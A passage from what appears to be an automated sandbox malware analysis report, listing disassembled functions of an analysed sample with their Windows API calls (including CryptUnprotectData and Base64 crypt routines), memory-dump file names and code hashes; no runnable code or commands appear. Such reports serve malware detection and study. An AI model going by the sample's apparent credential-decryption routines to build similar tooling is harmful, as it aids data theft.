                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 791cab09f1c5f1cbc23e6ba38235ffb36143109e1a4badae9988ab5376abb0a9
                                • Instruction ID: 2a18db116bc67656f7728a0cede35b5e1589660a78e4ecfa0a24648ed9942605
                                • Opcode Fuzzy Hash: 791cab09f1c5f1cbc23e6ba38235ffb36143109e1a4badae9988ab5376abb0a9
                                • Instruction Fuzzy Hash: 4F31C475A14119ABDB10DB58EC49FFFB77DEF44705F0441A9FA09E2240DBB05A088BA1
                                Function 003B40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003B40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003B40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003B4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 7c4c939662b3265bbdf8817a580fc3ff481d7677ca213feaadc62dafbb35f0d8
                                • Instruction ID: 2f1cff0e274b70d218132c754791001e3303ac6e123c1186ee58b0dfe3a91c1d
                                • Opcode Fuzzy Hash: 7c4c939662b3265bbdf8817a580fc3ff481d7677ca213feaadc62dafbb35f0d8
                                • Instruction Fuzzy Hash: 84015A74600205AFDB109FA5DC89FAABBADEF94315F108059FE0897240DA719940DBA4
                                Function 00399B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00399B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B61
                                • LocalFree.KERNEL32 ref: 00399B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                                • Instruction ID: a128f4963679e1cfeac8e7df350788ade1d0638200c5710aafccbb671a16f136
                                • Opcode Fuzzy Hash: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                                • Instruction Fuzzy Hash: FBF01D70340712AFEB311F69AC4EF567BA8EF14B50F250115FA45EA2D0D7B59844CAA4
                                Function 003ACAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                                • Instruction ID: f27638604731b7e9c9a570a856b384d58109ef60ee505461e664c5a2dda22a3f
                                • Opcode Fuzzy Hash: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                                • Instruction Fuzzy Hash: 0E317871A40614BFD711DB98CC96FEAB7B9DB88B14F104184FA04EB2D0D7B1AD44CBA0
                                Function 00399B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00399B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00399BB3
                                • LocalFree.KERNEL32(?), ref: 00399BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                                • Instruction ID: 6f35c391deb14dfaebb41db2120dcd50807f92af137de6a279d7538b04d3406c
                                • Opcode Fuzzy Hash: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                                • Instruction Fuzzy Hash: 510112B5E41309AFD7109BA4DC49FAEB778EB44700F104559EA04AB280D7B49904C7E5
                                Function 0074CCFC Relevance: 4.1, Strings: 2, Instructions: 1614COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Zu$\TT;
                                • API String ID: 0-1338121359
                                • Opcode ID: 2bec8d933e89ebec1843599465eda53fc73ff6cc4f0f910503e2454521cfb3e5
                                • Instruction ID: 431ac16e0a96fcb60dd81833024cfe78d3691386b24b09502ec45fc1d6184c99
                                • Opcode Fuzzy Hash: 2bec8d933e89ebec1843599465eda53fc73ff6cc4f0f910503e2454521cfb3e5
                                • Instruction Fuzzy Hash: AFB207F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DEAC493740EA7558058697
                                Function 00750DB0 Relevance: 1.9, Strings: 1, Instructions: 619COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: zf^Z
                                • API String ID: 0-3323650118
                                • Opcode ID: ecdcaba6d069f48ea2c7d13549ada6aa94eacd99c3b71cdc33eaffcc9f3a0eac
                                • Instruction ID: bfa35cc2e1a35131792a489860f54760e313696d168bfa5a322644d7ed3ccb50
                                • Opcode Fuzzy Hash: ecdcaba6d069f48ea2c7d13549ada6aa94eacd99c3b71cdc33eaffcc9f3a0eac
                                • Instruction Fuzzy Hash: E11216F3A0C2089FD7047E2DEC8567ABBE9EF94620F1A453DEAC4C3744F93599048696
                                Function 0065914D Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: fRu
                                • API String ID: 0-480668746
                                • Opcode ID: 657203ea1d040dc0868aebb822202bba435778af740210dc57e8f206ec4ac6dd
                                • Instruction ID: e8ae61a2e63f416a7c10734f1e9ab5e4b037776ce7cbfcfd158f8a61273bfaca
                                • Opcode Fuzzy Hash: 657203ea1d040dc0868aebb822202bba435778af740210dc57e8f206ec4ac6dd
                                • Instruction Fuzzy Hash: 5B5177F3E1C6009BE3546A2DECC57AAB7E1EF94310F1A453DEB84C7380F97858058286
                                Function 006A449A Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: L~{
                                • API String ID: 0-615811358
                                • Opcode ID: b4f6a694d48b6bdbe8a6dd5762f41c18fffec17fc737c8de2b330cc630bc18e2
                                • Instruction ID: 3ef6d7e142768dfe95657487211a50fcd058e2f3211c6716f253fb61d04a9049
                                • Opcode Fuzzy Hash: b4f6a694d48b6bdbe8a6dd5762f41c18fffec17fc737c8de2b330cc630bc18e2
                                • Instruction Fuzzy Hash: C1416CF360C3009FE3046B28EC8577AB7D6EBD4320F0A463DE6C487744E93A59058697
                                Function 007453D3 Relevance: .6, Instructions: 575COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e4c230b4f00814d2ae6a913aaa4b2c1a7e100b448e323bb8a60cf2b729c62be
                                • Instruction ID: e04275b415f9b7190a2515d90518b1edb75ddd93ec54d7a35bedf6a96795c2ca
                                • Opcode Fuzzy Hash: 1e4c230b4f00814d2ae6a913aaa4b2c1a7e100b448e323bb8a60cf2b729c62be
                                • Instruction Fuzzy Hash: 0802C3F390C2009FE705AF29DC8167AFBE9EF94720F16892DEAC4C3744E63558548A97
                                Function 0067122C Relevance: .2, Instructions: 212COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef1f8a4cc18c3e4a1f9e0b723be22dbf52f0f2aaef569ac2c34e958a4d0d6d6c
                                • Instruction ID: ff7f70ca9291766b944f436e4d028bccf525d5c42744bf11ff3bcfb14ce54b96
                                • Opcode Fuzzy Hash: ef1f8a4cc18c3e4a1f9e0b723be22dbf52f0f2aaef569ac2c34e958a4d0d6d6c
                                • Instruction Fuzzy Hash: 5461C5F360C6049FF308AE2ADC8573ABBD5EBD4320F16893DE6C583784E93958418656
                                Function 00698B73 Relevance: .2, Instructions: 203COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
